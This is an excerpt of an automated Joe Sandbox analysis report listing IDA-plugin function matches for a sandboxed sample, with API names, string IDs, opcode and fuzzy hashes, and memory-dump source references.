                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010$FileRead
                                                                                                                                                                                                                                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                                    • API String ID: 1046191242-1843600136
                                                                                                                                                                                                                                                                    • Opcode ID: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                                                    • Instruction ID: e2a9570a871c565af9b859ee56089887b7dfd66812692363ffb069ca447db785
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 834103E2A0C74686E6118F35E848DA9B7A6FF94B80F544032EE5D47694EF3CE846C748
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$connect
                                                                                                                                                                                                                                                                    • String ID: 3'
                                                                                                                                                                                                                                                                    • API String ID: 375857812-280543908
                                                                                                                                                                                                                                                                    • Opcode ID: 5eb7b83bdcbeebc66fb35dc6d107fd47d0d0fc8193655a836ea57c28fa277336
                                                                                                                                                                                                                                                                    • Instruction ID: 428edc16c8630e27337acb798091ab0a402dee1c39b4c0b13ca6877538a09735
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eb7b83bdcbeebc66fb35dc6d107fd47d0d0fc8193655a836ea57c28fa277336
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 203192B1B28F4286EB688F75E44417962A2FF447B4F08A335EA5D437B4DF3CE8408601
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastLibraryLoad
                                                                                                                                                                                                                                                                    • String ID: Could not find module '%.500S' (or one of its dependencies). Try using the full path with constructor syntax.$U|i:LoadLibrary$ctypes.dlopen
                                                                                                                                                                                                                                                                    • API String ID: 3568775529-808210370
                                                                                                                                                                                                                                                                    • Opcode ID: 0ef92c86ac34224fd7b744c122e0fbdae20da82744e633dcfb4756fea1e00fda
                                                                                                                                                                                                                                                                    • Instruction ID: 1f6fc711a0996a6cf0c9c96cebed4e7434102380b1f30ba7ac6b886a8cb4ec06
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ef92c86ac34224fd7b744c122e0fbdae20da82744e633dcfb4756fea1e00fda
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 672130A1A08E4781EF049B73F85407967A2AF5ABB5F04E036E90E42AB4DE7CE54DC300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                    • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                                    • Instruction ID: da5c33fd950796afd40a7cb3253b1ab66723926da7e83c5d5a300bda850eb57c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F417122D1878183E650BF20A554379A361FB94B64F509335EAD816FD2DFBCA5E0C770
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3251591375-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
Similarity
• API ID: ErrorLastioctlsocket
• String ID:
• API String ID: 1021210092-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007A3440closesocket
• String ID:
• API String ID: 3394225953-0
APIs
• CloseHandle.KERNEL32(?,?,?,00007FF7C267AA45,?,?,00000000,00007FF7C267AAFA), ref: 00007FF7C267AC36
• GetLastError.KERNEL32(?,?,?,00007FF7C267AA45,?,?,00000000,00007FF7C267AAFA), ref: 00007FF7C267AC40
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                    • Instruction ID: a524dea2fd5443b9b605d2abb9b29dfd3c99ee1e95fb12a2d6c3c56bcfd47aa7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E641B53290864187EA34BE25B54027DB3A2EB55F64F900135DACEA3B95CFADE442CB71
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _fread_nolock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 840049012-0
                                                                                                                                                                                                                                                                    • Opcode ID: 57c2c4b4067f487da02ee57e8c6367b5d15013a29cd3414ac047bd2cce026e08
                                                                                                                                                                                                                                                                    • Instruction ID: cd73bec62f283a293e7dc0aaf6d897f8531808d6072ab5a9e6e6a478bd517c0c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57c2c4b4067f487da02ee57e8c6367b5d15013a29cd3414ac047bd2cce026e08
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3621A521B0869195EE10BE2265043BAE662BF45BE4FCC5430EE8D27B86CEBDE045C634
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                                    • Instruction ID: 2047142ebe03a124250fb7c8311e13d22de2ff8ee8584a4d41f06ab39dcd6330
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6318022A18A4285F7517F65A84137CA662AB80FB4FC54135EAAD23BD2DFFCE441C731
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                    • Instruction ID: 8f912d2385c3f88dae71ea351b3bfd1e3355e7a2a62527987b0eac9727fe491f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB111A22A1864181EA61BF51A40027EE266EF85FA4FC44075EE8C67F96DFBDD840CB31
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction ID: c34f2c8fae4a3dc3146a2f8a38d8bfcd3162a30be87cbc6ee9328ec7bc1074e2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82219872618641C7D761AF18E440379B6A2FB84B64F944234D6DD57BD9DF7CD400CB20
                                                                                                                                                                                                                                                                    APIs
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: c9456ceb4fe01632cef678d9aadbf77850c5731ad6fc897e8ae8cbd5d41f32ff
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction Fuzzy Hash: 2A018E61A0874180EA14FF52A901169E692AF85FF0B984631EEDC27FDADFBCE451C330

APIs
Memory Dump Source
• Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
• Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
• Opcode ID: 857e2324bf16085a4ea68c05b138027c44fdbe11cde1698f6f4c9787cdbcdc49
• Instruction ID: ab83dd7347676288d1b8c56f78e1102c8d155cf452a2ee57fdd349bdf08766b2
• Opcode Fuzzy Hash: 857e2324bf16085a4ea68c05b138027c44fdbe11cde1698f6f4c9787cdbcdc49
• Instruction Fuzzy Hash: AEE04FF2E24A45C2DB185B66E0442687361F719FB4F68A721DA381B7E0DE38D5E1C740

APIs
  • Part of subcall function 00007FF7C2669400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C26645E4,00000000,00007FF7C2661985), ref: 00007FF7C2669439
• LoadLibraryExW.KERNEL32(?,00007FF7C2666466,?,00007FF7C266336E), ref: 00007FF7C2669092
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
• Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
• Instruction ID: d6d3d1b7817508e32ffa06638550218a770239df7310b8dae4dc9363d09245f5
• Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
• Instruction Fuzzy Hash: 58D08C11B2468581EA54BB77BA4A6299262AFC9BD0F988035EE8D03F5ADC3CC0418B10

APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF7C2670D00,?,?,?,00007FF7C267236A,?,?,?,?,?,00007FF7C2673B59), ref: 00007FF7C267D6AA
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction ID: 848aef8e66b9ae2dcdc6520eb95cc69ce6eedd6ff6394df9b344bcc75ee78248
• Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction Fuzzy Hash: BAF03004A0934285FE547F61A85127491D24F54FB0FA80A3098AE65BC1DF9CA480C230

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
• API String ID: 3122504284-1067337024
• Opcode ID: 5f15b9148e8d691bade7ac4299c338194b5adc1f0a67d16e58ed18eaea73a7c4
• Instruction ID: d61872a753dfd97880ad88c1b5927c5980d095bdf1e90bc2b2932f42312dbcef
• Opcode Fuzzy Hash: 5f15b9148e8d691bade7ac4299c338194b5adc1f0a67d16e58ed18eaea73a7c4
• Instruction Fuzzy Hash: 7A0233E2E4C68245FB658BF5D048B792AD1AF52B94F084231CAAF436C2EF3DE545C708

Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
• API String ID: 0-2031831958
                                                                                                                                                                                                                                                                    • Opcode ID: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
                                                                                                                                                                                                                                                                    • Instruction ID: 13851b09d8f640b39c63ffd240191f3ef8849bf1d63f7c192e269977d5433dc8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
